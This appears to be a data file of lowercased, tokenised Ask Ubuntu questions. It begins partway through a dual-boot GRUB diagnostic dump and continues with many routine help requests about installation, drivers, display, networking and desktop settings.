> > partition boot start sector end sector # of sectors id system > > /dev/sda1 * 63 39,062,562 39,062,500 83 linux > /dev/sda2 39,070,080 49,303,484 10,233,405 82 linux swap / solaris > > > '' blkid '' output : ________________________________________________________________ > > device uuid type label > > /dev/sda1 f7f81676-bd83-4fd9-96bc-a657785a491f ext4 ubuntu_12.04 > /dev/sda2 df6ae95d-e88d-4f4a-a010-b01a8d642f0a swap > /dev/sr0 iso9660 ubuntu 12.04 lts i386 > > ================================ mount points : ================================= > > device mount_point type options > > /dev/sda1 / ext4 ( rw , errors=remount-ro ) > /dev/sr0 /media/ubuntu 12.04 lts i386 iso9660 > ( ro , nosuid , nodev , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 , uhelper=udisks ) > > > =========================== sda1/boot/grub/grub.cfg : =========================== > > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- > # # # begin /etc/grub.d/00_header # # # > insmod part_msdos > if [ -s $ prefix/grubenv ] ; then > set have_grubenv=true > load_env > fi > set default= '' 0 '' > if [ `` $ { prev_saved_entry } '' ] ; then > set saved_entry= '' $ { prev_saved_entry } '' > save_env saved_entry > set prev_saved_entry= > save_env prev_saved_entry > set boot_once=true > fi > > function savedefault { > if [ -z `` $ { boot_once } '' ] ; then > saved_entry= '' $ { chosen } '' > save_env saved_entry > fi > } > > function recordfail { > set recordfail=1 > if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; > fi ; fi > } > > function load_video { > insmod vbe > insmod vga > insmod video_bochs > insmod video_cirrus > } > > insmod part_msdos > insmod ext2 > set root= ' ( hd0 , msdos1 ) ' > search -- no-floppy -- fs-uuid -- set=root f7f81676-bd83-4fd9-96bc-a657785a491f > if loadfont /usr/share/grub/unicode.pf2 ; then > set gfxmode=auto > load_video > insmod gfxterm > insmod part_msdos > insmod ext2 > set root= ' ( hd0 , msdos1 ) ' > search -- no-floppy -- fs-uuid -- set=root f7f81676-bd83-4fd9-96bc-a657785a491f > set locale_dir= ( $ root ) /boot/grub/locale > set lang=en_in > insmod gettext > fi > terminal_output gfxterm > if [ `` $ { recordfail } '' = 1 ] ; then > set timeout=-1 > else > set timeout=10 > fi > # # # end /etc/grub.d/00_header # # # > > # # # begin /etc/grub.d/05_debian_theme # # # > set menu_color_normal=white/black > set menu_color_highlight=black/light-gray > if background_color 44,0,30 ; then > clear > fi > # # # end /etc/grub.d/05_debian_theme # # # > > # # # begin /etc/grub.d/10_linux # # # > function gfxmode { > set gfxpayload= '' $ { 1 } '' > if [ `` $ { 1 } '' = `` keep '' ] ; then > set vt_handoff=vt.handoff=7 > else > set vt_handoff= > fi > } > if [ `` $ { recordfail } '' ! = 1 ] ; then > if [ -e $ { prefix } /gfxblacklist.txt ] ; then > if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then > if [ $ { match } = 0 ] ; then > set linux_gfx_mode=keep > else > set linux_gfx_mode=text > fi > else > set linux_gfx_mode=text > fi > else > set linux_gfx_mode=keep > fi > else > set linux_gfx_mode=text > fi > export linux_gfx_mode > if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi > menuentry 'ubuntu , with linux 3.2.0-37-generic-pae ' -- class ubuntu -- class gnu-linux > -- class gnu -- class os { > recordfail > gfxmode $ linux_gfx_mode > insmod gzio > insmod part_msdos > insmod ext2 > set root= ' ( hd0 , msdos1 ) ' > search -- no-floppy -- fs-uuid -- set=root f7f81676-bd83-4fd9-96bc-a657785a491f > linux /boot/vmlinuz-3.2.0-37-generic-pae root=uuid=f7f81676-bd83-4fd9-96bc-a657785a491f ro quiet splash > $ vt_handoff > initrd /boot/initrd.img-3.2.0-37-generic-pae > } > menuentry 'ubuntu , with linux 3.2.0-37-generic-pae ( recovery mode ) ' -- class ubuntu > -- class gnu-linux -- class gnu -- class os { > recordfail > insmod gzio > insmod part_msdos > insmod ext2 > set root= ' ( hd0 , msdos1 ) ' > search -- no-floppy -- fs-uuid -- set=root f7f81676-bd83-4fd9-96bc-a657785a491f > echo 'loading linux 3.2.0-37-generic-pae ... ' > linux /boot/vmlinuz-3.2.0-37-generic-pae root=uuid=f7f81676-bd83-4fd9-96bc-a657785a491f ro recovery nomodeset > echo 'loading initial ramdisk ... ' > initrd /boot/initrd.img-3.2.0-37-generic-pae > } > submenu `` previous linux versions '' { > menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ' -- class ubuntu -- class gnu-linux > -- class gnu -- class os { > recordfail > gfxmode $ linux_gfx_mode > insmod gzio > insmod part_msdos > insmod ext2 > set root= ' ( hd0 , msdos1 ) ' > search -- no-floppy -- fs-uuid -- set=root f7f81676-bd83-4fd9-96bc-a657785a491f > linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=f7f81676-bd83-4fd9-96bc-a657785a491f ro quiet splash $ vt_handoff > initrd /boot/initrd.img-3.2.0-23-generic-pae > } > menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ( recovery mode ) ' -- class ubuntu > -- class gnu-linux -- class gnu -- class os { > recordfail > insmod gzio > insmod part_msdos > insmod ext2 > set root= ' ( hd0 , msdos1 ) ' > search -- no-floppy -- fs-uuid -- set=root f7f81676-bd83-4fd9-96bc-a657785a491f > echo 'loading linux 3.2.0-23-generic-pae ... ' > linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=f7f81676-bd83-4fd9-96bc-a657785a491f ro recovery nomodeset > echo 'loading initial ramdisk ... ' > initrd /boot/initrd.img-3.2.0-23-generic-pae > } > } > # # # end /etc/grub.d/10_linux # # # > # # # begin /etc/grub.d/20_linux_xen # # # > # # # end /etc/grub.d/20_linux_xen # # # > # # # begin /etc/grub.d/20_memtest86+ # # # > menuentry `` memory test ( memtest86+ ) '' { > insmod part_msdos > insmod ext2 > set root= ' ( hd0 , msdos1 ) ' > search -- no-floppy -- fs-uuid -- set=root f7f81676-bd83-4fd9-96bc-a657785a491f > linux16 /boot/memtest86+.bin > } > menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { > insmod part_msdos > insmod ext2 > set root= ' ( hd0 , msdos1 ) ' > search -- no-floppy -- fs-uuid -- set=root f7f81676-bd83-4fd9-96bc-a657785a491f > linux16 /boot/memtest86+.bin console=ttys0,115200n8 > } > # # # end /etc/grub.d/20_memtest86+ # # # > # # # begin /etc/grub.d/30_os-prober # # # > # # # end /etc/grub.d/30_os-prober # # # > # # # begin /etc/grub.d/30_uefi-firmware # # # > # # # end /etc/grub.d/30_uefi-firmware # # # > # # # begin /etc/grub.d/40_custom # # # > # this file provides an easy way to add custom menu entries . simply type the > # menu entries you want to add after this comment . be careful not to change > # the 'exec tail ' line above . > menuentry `` windows 7 '' { > insmod part_gpt > insmod ntfs > insmod search_fs_uuid > insmod chain > search -- fs-uuid -- no-floppy -- set=root df6ae95d-e88d-4f4a-a010-b01a8d642f0a > chainloader ( $ { root } ) /efi/microsoft/boot/bootmgfw.efi > } > # # # end /etc/grub.d/40_custom # # # > # # # begin /etc/grub.d/41_custom # # # > if [ -f $ prefix/custom.cfg ] ; then > source $ prefix/custom.cfg ; > fi > # # # end /etc/grub.d/41_custom # # # > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- > =============================== sda1/etc/fstab : ================================ > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- > # /etc/fstab : static file system information . > # > # use 'blkid ' to print the universally unique identifier for a > # device ; this may be used with uuid= as a more robust way to name devices > # that works even if disks are added and removed . see fstab ( 5 ) . > # > # < file system > < mount point > < type > < options > < dump > < pass > > proc /proc proc nodev , noexec , nosuid 0 0 > # / was on /dev/sda1 during installation > uuid=f7f81676-bd83-4fd9-96bc-a657785a491f / ext4 errors=remount-ro > 0 1 > # swap was on /dev/sda2 during installation > uuid=df6ae95d-e88d-4f4a-a010-b01a8d642f0a none swap sw > 0 0 > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- > =================== sda1 : location of files loaded by grub : ==================== > gib - gb file fragment ( s ) > 2.222815990 = 2.386730496 boot/grub/core.img 1 > 2.216872692 = 2.380348928 boot/grub/grub.cfg 1 > 8.361613750 = 8.978214400 boot/grub/stage2 1 > 1.656280041 = 1.778417152 boot/initrd.img-3.2.0-23-generic-pae 4 > 1.755408764 = 1.884855808 boot/initrd.img-3.2.0-37-generic-pae 2 > 8.359111309 = 8.975527424 boot/vmlinuz-3.2.0-23-generic-pae 1 > 1.461738110 = 1.569529344 boot/vmlinuz-3.2.0-37-generic-pae 1 > 1.656280041 = 1.778417152 initrd.img 4 > 1.656280041 = 1.778417152 initrd.img.old 4 > 8.359111309 = 8.975527424 vmlinuz 1 > > ========= devices which do n't seem to have a corresponding hard drive : ========= > sdb > =============================== stderr messages : =============================== > xz : ( stdin ) : compressed data is corrupt i also tried adding grub_preload_modules= '' part_msdos '' in /etc/default/grub file and menuentry `` windows 7 '' { insmod part_msdos insmod ntfs insmod search_fs_uuid insmod chain search -- fs-uuid -- no-floppy -- set=root df6ae95d-e88d-4f4a-a010-b01a8d642f0a chainloader ( $ { root } ) /efi/microsoft/boot/bootmgfw.efi } in the /etc/grub.d/40_custom file , and updated the grub - as suggested by another forum trying to configure the menu options in grub . 1 more thing.. i am not able to see the windows7 partition in ubuntu , as you can see in bootinfosummary ! does this mean that i have formatted the windows partition ? ? $ sudo fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000ec888 device boot start end blocks id system /dev/sda1 * 63 39062562 19531250 83 linux partition 1 does not start on physical sector boundary . /dev/sda2 39070080 49303484 5116702+ 82 linux swap / solaris
250539	what is wrong with this method of using an alternate lock screen background ?	i have recently been trying to separate all three wallpaper states that are all the same as default . they are : unity greeter lock screen desktop all of them have a wallpaper , and as default the three are all the same and changed by changing the desktop wallpaper . it is fairly simple to change the log in background in lightdm , but i have n't found any successful attempts to change the lock screen background and 'free ' it from the consistent background setting . i was looking around for a solution , and i got this : sudo gconftool-2 -- direct -- config-source xml : readwrite : /etc/gconf/gconf.xml.defaults -- set /desktop/gnome/background/picture_filename -- type string /path/to/image.jpg but it just does n't work . no errors , no notes - it simply does affect the settings at all . the file it edits exists , and it looks reasonably legitimate for the purpose - but it 's ineffective . how would you correct the command or diagnose the problem with it ? i am using ubuntu 12.10 quantal quetzal and am running unity ( if that is n't already obvious ) .
250542	ca n't install ubuntu 12.10 from usb	i ca n't install ubuntu 12.10 from usb drive . i tried lili , unetbootin , universal usb installer and others for create usb . it boots and i can select `` try ubuntu without installing '' and `` install ubuntu on hard disk '' . but when i select any option , ubuntu screen with 5 dots shows , it fills all 5 dots with red color and after it shows console with `` authentication failure '' maybe 5 times in a row . and it hangs there . can you help me how can i get it working please ? my notebook is lenovo g580 . i tried disable/enable uefi boot but it does n't help . i do n't have dvd drive so i ca n't install it from cd/dvd .
250543	struggling to get gps bluetooth auto-started on boot in 10.10	say i want gpsd to monitor a bluetooth device , therefore replacing devices line in `` /etc/defaults/gpsd '' with : devices= '' /dev/rfcomm0 '' say i also have the following content in `` /etc/bluetooth/rfcomm.conf '' : rfcomm0 { bind yes ; device xx : xx : xx : xx : xx : xx ; channel 1 ; comment `` blah '' ; } i would have expected the bind yes thing to have the connection auto-start on boot-up ( source ) , but it did n't . note that this works on ubuntu 12.04 .
250545	getting full user name	how do i look up my full user name in ubuntu ? i want this information to propagate to the environment variables git_author_name and git_committer_email .
250549	moving /sys to another partition without reinstalling	to cut a long tedious story short , i have two partitions on an ssd . the much larger one has ubuntu 10.04 , the small one has 12.04 . in the past few weeks i 've finally been moving away from using 10.04 to 12.04 ( i was tardy doing this because on this particular laptop there were a number of problems with 12.04 but i 've now worked around these ) at this point i have 12.04 working the way i want , but it 's been painful and i 'd rather not have to go through it again . however , the 12.04 partition is too small ( only about 500mb left and i 'm bound to eat into this in the future if the past is a guide ) so i 've already moved my home directory to the 10.04 partition but i 'd like to move /sys too ( as this is has by far the largest footprint of what 's left ) i understand that /sys is a mount point so i 'm wondering if simply making it a link to a directory on the bigger partition is going to work ( at all or work reliably ) ? do i need to worry about disk mount order ?
250551	how to mount a usb device in read only mode ?	i wish to securely copy files from a usb external drive such that no files on that drive may be modified spuriously . would someone tell me in relatively simple wording how to accomplish this please ? the simple wording is due to the fact that i am a recent linux user and solely an ubuntu linux user .
250554	is there a simple fix to get my launcher size slider bar back in settings > appearance ?	my launcher icon size slider bar recently disappeared from the system settings since recent updates . i 'm running ubuntu 12.04 , but i am not comfortable editing files or anything like that , so i need a simple fix . thanks !
250555	how to define disk usage during ubuntu installation	i am trying to install ubuntu on d : drive ( 228 gb ) with wubi . installation size is by default 15 gb . will i be able to utilize the balance 213 gb of empty disk space or do i need to partition/shrink the drive ?
250561	emacs blinking when switching desktop on ubuntu	i am using emacs with ubuntu ( 12.04 lts ) . i used the following command to put it on fullscreen ( defun toggle-fullscreen ( & optional f ) ( interactive ) ( let ( ( current-value ( frame-parameter nil 'fullscreen ) ) ) ( set-frame-parameter nil 'fullscreen ( if ( equal 'fullboth current-value ) ( if ( boundp 'old-fullscreen ) old-fullscreen nil ) ( progn ( setq old-fullscreen current-value ) 'fullboth ) ) ) ) ) quite recently ( after some update i guess ) something iritating has begin to happen . each time i switch from one deskop to the one containing emacs in fullscreen the menu bar and the small diagram in the middle of the screen representing the four virtual deskops blink a dozen of times before disapearing as normal ( being hidden by the fullscreen emacs frame ) . do you have any idea about what is causing this behaviour and how i could correct it ?
250565	how to merge text files ?	i have saved many documents as txt . i want to print them together so first i want them together in a single file . the order does n't matter in this case . i want a solution that does not involve typing the names of the files to be merged , but one that would just merge all txt files within the folder . can i do it with a command or some gui ? i looked here . do n't know how to use join .
250573	virtualbox kernel modules do not match the version of virtualbox	the virtualbox 4.2.12 on ubuntu 12.04 was running fine till i needed to install guest additon . after its installation : failed to open a session for the vm win 7 exit code 1 ; rtr3init failed with rc=-1912 ( rc=1912 ) after running dpkg -- list | grep virtualbox : ii virtualbox 4.1.12-dfsg-2ubuntu0.2 x86 virtualization solution - base binaries rc virtualbox-4.2 4.2.6-82870~ubuntu~precise oracle vm virtualbox ii virtualbox-dkms 4.1.12-dfsg-2ubuntu0.2 x86 virtualization solution - kernel module sources for dkms ii virtualbox-guest-additions 4.1.12-1 transitional package for virtualbox-guest-additions-iso ii virtualbox-guest-additions-iso 4.1.12-1 guest additions iso image for virtualbox ii virtualbox-qt 4.1.12-dfsg-2ubuntu0.2 x86 virtualization solution - qt based user interface any help is appreciated ... thanks ...
250574	playing with head in ubuntu	hi while i am playing with ubuntu head command of cli , i came to a situation.there what ever i am giving as input thats echoing automatically . the command and its play mentioned in the image . so could somebody explain me whats happening in there ? . note : here h.txt is a general text file i made with raw information .
250579	ubuntu suspends when the lid is closed after pressing shutdown	i am running 12.10 . usually when i am in a hurry i press the shutdown button on the bar and close the lid of my laptop just after that . often , i observe that instead of shutting down , the system suspends ( because i closed the lid right after ) and the shut down process resumes after i reopen the lid which wakes it up . is there any workaround such that once the shutdown button has been pressed , ubuntu does not allow `` suspension on lid close '' and it carries out the shutdown ( and not the sleep ) even if the lid is pulled down right after the shutdown button is pressed ? also , i do n't want to switch off the `` sleep on lid close '' feature either .
250583	how to upgrade a custom ubuntu installation without installing any default applications like unity ?	i make a choice to install ubuntu using an alternate cd/dvd with the minimal installation option . after that i run a shell script that will install my favourite desktop environment and applications . now it 's time to upgrade my ubuntu version to a new one . but i think that if i do so , that the ubuntu upgrade procedure will install unity and many other ubuntu applications that i do n't like and do n't need . is there a way to not allow the upgrade script to install any ubuntu default applications , just upgrade the core and my already installed applications ?
250587	keyboard shortcut to hide onscreen keyboard	what 's the command for hiding and unhiding the onscreen keyboard called onboard in ubuntu ? currently it 's possible to click on the cross button at the upper right corner of the onscreen keyboard to hide it . you can unhide it again , by clicking on it 's symbol , when the appropriate option is activated in the onboard settings . i would like to bind the command for revealing and hiding onboard , like it is shown here . thanks in advance !
250591	how do i make space in /boot/ ?	i have /boot/ on a separate partition from / , and /boot/ is 98 % full . how do i make more space on it ?
250592	unable to install ubuntu on hp pavilion dv6	i tried installing ubuntu 12.04 on my laptop ( hp pavilion dv6 ) . can you guys please tell me whether it is possible to install it or is 12.10 version of ubuntu compatible with it ? i heard there problem is because of the graphics card .
250596	frequency out of range	i am a entry level person for ubuntu using 11.10 currently trying to install it on a hdd . i am facing the issue of `` frequency out of range '' problem and i have followed this advice but the issue is not getting resolved at my end . i am using lg studioworks crt monitor ( 6-7 years old ) i have a p4 and 10gb hdd totally dedicated to ubuntu 11.10. i am installinging from a dvd . i could change the configuration in /etc/default/grub to 640x480 but it is not allowing me to save and the as per the posting we need to reboot . now on reboot the same installation procedure starts all over again without the changes made as it is done from dvd . i want experts to find me a way out .
250597	ubuntu 12.10 disk partition after installation	i bought a laptop with 500 gb hard disk and installed ubuntu 12.10 on it . during installation it gave me an option to make drives after installing ( or something like that ) and skipped the core step of making drives and now i can see whole 500gb under ubuntu 12.10 and i 'm unable to make separate drives . please help..what can be done now . i may only use ubuntu and willing to make drives to store data on them so that there is less burden on the main drive and my system can run fast -- am i right in thinking so ? thanks in advance ... . : d
250605	unity and kde desktop on the same screen	as you can see in the screenshot below , the user has managed to run kde desktop in unity ( or vice versa ? ) i 've already installed kubuntu-desktop package and compizconfig settings manager and also able to switch to kde desktop separately but could n't find a way to run both on same screen . so my question is , how to get this done ?
250607	i want to start using ubuntu , but	i 'm very tempted to start using ubuntu , but the only thing that holds me back is gaming . i 've heard gaming on ubuntu is n't as good as it is on windows . can anyone tell me why , or what can be done to make it better ? thank you in advance .
250610	how do i remove oracle java 7 from ubuntu 11.10	i currently got ubuntu 11.10 installed on my laptop . and yesterday , i got java 7 . before i got java 7 , my minecraft worked 100 % . but after getting java 7 , my minecraft stopped working . so can you guys please find a way for me to 100 % remove java 7 from my system and get java 6 back ! !
250611	google chrome - flash plugin crashes	everything works fine , but yesterday , after update i cant load any flash video in google chrome . i can see `` could n't load plug-in '' . however flash works in firefox . ubuntu 12.04 - 64b google chrome 24.0.1312.57 could anyone help me ?
250615	wireless issue with broadcom bcm43142 ( 12.10 ubuntu )	i ca n't seem to get the wireless working on my new dell laptop . the following are the specs : 01:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) it 's an i686 arch so i ca n't directly install the amd deb file available on gemnetworks . can anyone please help me with this problem ?
250619	how to disable mouse scrolltabs ubuntu chrome	when i hover on tabs in chrome and scroll the mouse wheel , the tabs are changing focus . this feature is really annoying for me and i want to turn it off . any ideas ? p.s . the way i usually close an opened tab is to hover the pointer over that tab and click the wheel ( also known as middle button ) . this feature is kind of a convention and is available in many applications .
250620	upgrade from 12.04 to 12.10 all i get when i boot up is memtest86 i have tried to access grub and theer is only memtest in there	12.04 upgrade to 12.10 all i get when i boot up is memtest86 i have tried to access grub and there is only memtest in there .
250623	cant boot after uninstall amd catalyst beta	i 'm running ubuntu 12.04 and i have installed the newest beta 12.11. amd catalyst driver . i noticed my computer freezes sometimes so i decided to put back older 12.10 ... and i removed driver by following this ... what packages/how do i uninstall propriety amd catalyst driver since that , i cant boot anymore to my desktop , it jus goes to tty1 login , console ... i tried everything i found on the internet and nothing worked ... after uninstalling ati fglrx drivers ubuntu 11.10 wont boot this also doesnt work for me ... can someone help ?
250626	getting `` account locked '' error while trying to log in yahoo ! in `` pidgin messenger ''	it 's been over 2 months that i get this error : '' yahooid @ yahoo.com disabled account locked : too many failed login attempts . logging into the yahoo ! website may fix this . '' i did log in to my yahoo account by going into `` mail.yahoo.com '' website and i could access the chats there . but still no luck with pidgin . before it was fine and i could sign in without a problem . and even now i can sign in via pidgin messenger with my msn account without a problem . i use ubuntu 12.10 . how can i fix this ?
250630	how can i turn off xfce session saving system-wide ?	we are working with a terminal server that is running xubuntu . because we have had some issues with saved sessions , we want to turn off the saving of sessions completely . so far , we have been able to set the default to not saving the session , but in the logout screen it is still possible to save the session . is it possible to turn off session saving completely ( system-wide ) so our users wo n't `` accidentally '' use it ?
250632	how do i change what happens after i insert an audio cd ?	long ago i told ubuntu to always open banshee whenever i inserted an audio cd , but that behavior has gotten rather annoying as i am in the process of archiving my entire cd collection . i would like to change the behavior to `` do nothing '' . i followed the instructions in the answer to this question : how do i banish the `` you have just inserted an audio cd . '' dialog forever ? , but the preferences - > media tab is nowhere to be seen . how do i accomplish this for ubuntu 12.04 ?
250633	tripwire local passphrase does n't work , how do i reset it ?	my tripwire local passphrase does not work any more ( no idea why ) and i want to reset it . how can i do this ? i still have the system passphrase ( hopefully ) open source tripwire ( r ) 2.4.2.2.2 built for i686-pc-linux-gnu open source tripwire 2.4 portions copyright 2000 tripwire , inc. tripwire is a registered
250635	no display on resume from suspend	my netbook display stays black after resume from suspend about 70 % of the time . the only remedy is to either close the lid and open again ( to sleep the system ) and see if that brought the display back , or kill the system ( yank the battery or hold the power switch ) and reboot cold . acer aod250 intel 945gse ( gma 950 graphics ) chipset . xubuntu 12.10 i have seen questions like this asked again and again and never answered . for several years now . this is not a new bug , this is a very very very old bug that nobody seems to be interested in fixing . but guess what ? windows xp suspend works just fine . yes , i wiggle my finger on the touchpad . yes i hit every single key on the keyboard . yes , i tried ctrl-alt-f1 . yes , i even tried plugging in a usb mouse and wiggling it too . there is no xconfig file in /etc/x11 to edit . does anybody anywhere in the linux universe have an answer to this question , or does nobody on the planet use it on a laptop , and therefore could n't care less if suspend works ? hello ? bueller ? bueller ?
250636	ca n't connect to internet in ubuntu	i 'm not getting the network icon in the top toolbar of ubuntu so i checked the ubuntu help section where i ran the troubleshoot command ( nm-applet ) and i also tried nm-tool but neither worked and both show : ( process:2142 ) : warning : could not initalise nmclient /org/freedesktop/networkmanager i 'm running 12.10 using the windows desktop installer to run ubuntu in a dual-boot . how to fix this issue ? hope you can help and i 'll be willing to answer any questions ; )
250637	why am i being asked for an unknown username & password during startup ?	i installed an updated version of a graphic driver and then restarted the computer to complete installation . during the next startup , the plain purple ubuntu screen was replaced by a black screen displaying ubuntu 12.04.1 lts compaqpresario tty1 user login : then when a login is entered a request for a password . my user login info for ubuntu is n't working , and neither are any of the suggested default login infos i 've found here or in other forums . i 've tried every possible combination of my own logins , the examples of default ones and anything else that came to mind but all were incorrect . i 've carried out a network boot from another computer running the same version of ubuntu , and from a memory stick with ubuntu live but startup goes straight to the password request before any boot options appear . can anyone explain what has caused this and if there is someway to do a restore , stuck as i am halfway through startup ? or does anybody know which user name and password it may be requesting ? even a suggestion for some way to get around this password request and into ubuntu or into boot options would help me out .
250642	ubuntu 12.10 second monitor not detected at all	i have a desktop system in which i just spent a small fortune replacing the motherboard and graphics card because i thought they were broken , and after doing so , i still have the same problem . the second monitor , the one plugged into the dvi connector is not detected at all . i have read dozens of posts with similar problems , but none of the solutions have worked for me . i have run dual monitors on ubuntu almost since the beginning of ubuntu with no problem . anticipating questions back.. yes , i have the correct sources installed and the nvidia 304 driver installed after installing the sources and headers . i am at a loss , as this is my main work machine , i need two monitors , and i have been trying to solve this for over 24 hours ( except for the 4 hours i was asleep ) . any one got any clues at all ? regards derek
250647	how to choose a resolution for grub2 ?	i 'm using gnome 3.6.2 with ubuntu 12.10 , my screen resolution is currently 1680x1050 , but in grub it was something different . first i used /etc/default/grub to uncomment the resolution line and change it to the same resolution i usually use . when that did n't work i downloaded grub customizer and changed it there . that did n't work so i ran this : sudo hwinfo -- framebuffer and got this output : mode 0x0382 : 320x200 ( +320 ) , 8 bits mode 0x030d : 320x200 ( +640 ) , 15 bits mode 0x030e : 320x200 ( +640 ) , 16 bits mode 0x030f : 320x200 ( +960 ) , 24 bits mode 0x0320 : 320x200 ( +1280 ) , 24 bits mode 0x0392 : 320x240 ( +320 ) , 8 bits mode 0x0393 : 320x240 ( +640 ) , 15 bits mode 0x0394 : 320x240 ( +640 ) , 16 bits mode 0x0395 : 320x240 ( +960 ) , 24 bits mode 0x0396 : 320x240 ( +1280 ) , 24 bits mode 0x03a2 : 400x300 ( +400 ) , 8 bits mode 0x03a3 : 400x300 ( +800 ) , 15 bits mode 0x03a4 : 400x300 ( +800 ) , 16 bits mode 0x03a5 : 400x300 ( +1200 ) , 24 bits mode 0x03a6 : 400x300 ( +1600 ) , 24 bits mode 0x03b2 : 512x384 ( +512 ) , 8 bits mode 0x03b3 : 512x384 ( +1024 ) , 15 bits mode 0x03b4 : 512x384 ( +1024 ) , 16 bits mode 0x03b5 : 512x384 ( +1536 ) , 24 bits mode 0x03b6 : 512x384 ( +2048 ) , 24 bits mode 0x03c2 : 640x350 ( +640 ) , 8 bits mode 0x03c3 : 640x350 ( +1280 ) , 15 bits mode 0x03c4 : 640x350 ( +1280 ) , 16 bits mode 0x03c5 : 640x350 ( +1920 ) , 24 bits mode 0x03c6 : 640x350 ( +2560 ) , 24 bits mode 0x0300 : 640x400 ( +640 ) , 8 bits mode 0x0383 : 640x400 ( +1280 ) , 15 bits mode 0x0384 : 640x400 ( +1280 ) , 16 bits mode 0x0385 : 640x400 ( +1920 ) , 24 bits mode 0x0386 : 640x400 ( +2560 ) , 24 bits mode 0x0301 : 640x480 ( +640 ) , 8 bits mode 0x0310 : 640x480 ( +1280 ) , 15 bits mode 0x0311 : 640x480 ( +1280 ) , 16 bits mode 0x0312 : 640x480 ( +1920 ) , 24 bits mode 0x0321 : 640x480 ( +2560 ) , 24 bits mode 0x0303 : 800x600 ( +800 ) , 8 bits mode 0x0313 : 800x600 ( +1600 ) , 15 bits mode 0x0314 : 800x600 ( +1600 ) , 16 bits mode 0x0315 : 800x600 ( +2400 ) , 24 bits mode 0x0322 : 800x600 ( +3200 ) , 24 bits mode 0x0305 : 1024x768 ( +1024 ) , 8 bits mode 0x0316 : 1024x768 ( +2048 ) , 15 bits mode 0x0317 : 1024x768 ( +2048 ) , 16 bits mode 0x0318 : 1024x768 ( +3072 ) , 24 bits mode 0x0307 : 1280x1024 ( +1280 ) , 8 bits mode 0x0319 : 1280x1024 ( +2560 ) , 15 bits mode 0x031a : 1280x1024 ( +2560 ) , 16 bits mode 0x0340 : 1400x1050 ( +1400 ) , 8 bits mode 0x0341 : 1400x1050 ( +2800 ) , 15 bits mode 0x0342 : 1400x1050 ( +2800 ) , 16 bits mode 0x0343 : 1400x1050 ( +4200 ) , 24 bits mode 0x0344 : 1400x1050 ( +5600 ) , 24 bits mode 0x0372 : 1600x1200 ( +1600 ) , 8 bits the resolution i have grub set to now does n't appear on that list . maybe that 's why it 's resisting my changes ? is this a list of all the resolutions my video card can handle , or just a list of resolutions ? i tried out a couple of them to see if they looked okay but none of them seem to be anywhere close to the ratio i use now ( 16:10 ) . the only thing that bothers me is that the words are cut off and my pretty picture wo n't show . i 'm just looking for a resolution that 'll show both boot options .
250648	what can be done to increase my ubuntu 's speed ?	i have a 1gib ram and my operations are mostly using 3 internet tabs at a time , while working on a document ( sometimes , like 53 % of the time ) however , my winxp seems to work faster than ubuntu . is this a natural drawback of ubuntu , or is there something i should do ? ( i also constantly remove unwanted programs from time to time ) note : i 'm not that rich to buy 4 gb memory rams .
250651	how to set touchpad double tap like in mint ?	i 'm running ubuntu 12.10 64bit . the default corner tap is not reliable enough for me . i remember when i used mint , there was an easy way to make it so a two finger tap would act as a middle click . can someone show me how i can configure this in ubuntu ? i have tried systemsettings - > mouseandtouchpad - > touchpad but there are not many options in there .
250659	sharing ubuntu desktop on the internet	at home , i have ubuntu linux 10.04 on a spare laptop and a dsl connection that 's always on . what are the steps to securely ( very important ) share this on the web with like dyndns or something and port forwarding so that i can access it over port 443 ( https port ) over the web and access the gui of the desktop ? my dsl router supports port forwarding . see , sometimes i 'm in a hotel with bad internet ( only ports 80 and 443 available ) and need a way to connect to a power user workstation so that i can do emergency systems operations tasks for my employer .
250660	no surround 5.1 mode in dell6410 with intel card	i have ubuntu 12.04 installed as sa system in my dell6410 . the audio card is intel ibexpeak hdmi the problem is that i cant get audio the audio card to play 5.1 sound through the hdmi/display port . i only get analog audio the laptop is connected through display port/hdmi cable to the tv . the tv is connected with an optic cable to the receiver ( 5.1 ) aplay -l : list of playback hardware devices < br > card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] < br > subdevices : 1/1 < br > subdevice # 0 : subdevice # 0 < br > card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] < br > subdevices : 0/1 < br > subdevice # 0 : subdevice # 0 < br > card 0 : intel [ hda intel ] , device 7 : hdmi 1 [ hdmi 1 ] < br > subdevices : 1/1 < br > subdevice # 0 : subdevice # 0 < br > my alsamixer version is 1.0.25 within sound there is no digital 5.1 mode option when trying to test only front left and front right speakers are working i tried everything that is written somewhere in internet and nothing . finally i have a fresh and clean ubuntu 12.04 , but the problem persists .
250663	change webdav permissions for creating files and folders	files and folders created through webdav are assigned www-data.www-data and permission 740 . i 've already added my user to the www-data group , but i 'd like to change the permission to 770 , so i can modify them after they are created , without using sudo .
